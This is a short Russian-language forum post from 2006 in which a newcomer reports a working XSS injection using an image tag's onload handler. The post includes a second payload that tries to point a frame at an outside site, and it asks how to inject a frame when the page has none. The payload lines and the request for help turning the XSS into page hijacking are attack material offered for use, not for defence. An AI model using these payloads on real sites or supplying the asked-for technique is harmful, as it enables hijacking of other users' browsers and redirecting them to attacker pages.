15.01.2006, 16:43
|
|
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353
Репутация:
0
|
|
Столкнулся с той же проблемой.
Например срабатывает такое XSS:
Код:
<image src="a.jpg" onload=alert();>
Нужно вставить фрейм, пробовал так:
Код:
<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">
Но чтобы это сработало, нужно, чтобы страница содержала какой нибудь другой фрейм.
Подскажите, пожалуйста, как это еще можно осуществить. |
|
|